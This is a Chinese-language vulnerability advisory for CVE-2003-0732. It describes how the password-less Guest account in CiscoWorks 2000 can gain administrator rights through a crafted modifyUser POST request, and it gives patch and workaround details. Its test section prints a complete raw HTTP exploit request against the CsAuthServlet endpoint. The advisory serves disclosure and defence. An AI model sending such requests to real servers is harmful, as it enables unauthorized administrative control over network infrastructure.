CiscoWorks 2000权限提升漏洞
发布日期:2003-08-13
更新日期:2003-08-15
受影响系统:Cisco CiscoWorks 2000
描述:
CVE(CAN) ID:
CVE-2003-0732
CiscoWorks 2000是一款Cisco发布的综合网络管理系列产品。
CiscoWorks 2000不正确处理用户提交的特殊URL,远程攻击者可以利用这个漏洞获得管理员权限访问CiscoWorks 2000服务器。
Portcullis发现使用默认没有设置密码的Guest帐户,可以提升Guest用户的权限为管理员权限。当提交更改用户帐户时,HTML会在下面的字符串中显示用户信息:
cmd=modifyUser&name=guest&pwd=cGFzc3dvcmQ%3D&email=test%0test.com&ccoId=&ccoPwd=&proxyId=&proxyPwd=&priviledges=0
从下面信息可以获得更改用户权限级别是从0到F之间,而F是管理员权限的代码。因此攻击者可以提交特殊的POST请求,获得管理员权限,完成一些如调度控制,软件升级,增加或删除设备,增加或删除帐户的管理员操作。
<*来源:Portcullis Security Advisory (
Omicron@portcullis-security.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=106079235206611&w=2
http://www.cisco.com/warp/public/707/cisco-sa-20030813-cmf.shtml
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Portcullis Security Advisory (
Omicron@portcullis-security.com)提供了如下测试方法:
POST /CSCOnm/servlet/com.cisco.nm.cmf.servlet.CsAuthServlet HTTP/1.0
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: 10.10.10.1:1741
Content-Length: 114
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: jrunsessionid=1057059156201223367
cmd=modifyUser&name=guest&pwd=&email=&ccoId=&ccoPwd=&proxyId=&proxyPwd=&priviledges=0
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 管理Guest用户帐户,并限制只有可信用户能访问CiscoWorks服务器。
厂商补丁:
Cisco
-----
Cisco已经为此发布了一个安全公告(cisco-sa-20030813-cmf)以及相应补丁:
cisco-sa-20030813-cmf:CiscoWorks Application Vulnerabilities
链接:
http://www.cisco.com/warp/public/707/cisco-sa-20030813-cmf.shtml
所有漏洞在CiscoWorks Common Services 2.2中已经得到解决。
CMF 2.0和2.1的补丁在2003 8月底公布。
您可以从Cisco网站的软件中心下载升级程序:
http://tools.cisco.com/gct/Upgrade/jsp/index.jsp(只限注册用户)浏览次数:3783
严重程度:0(网友投票)
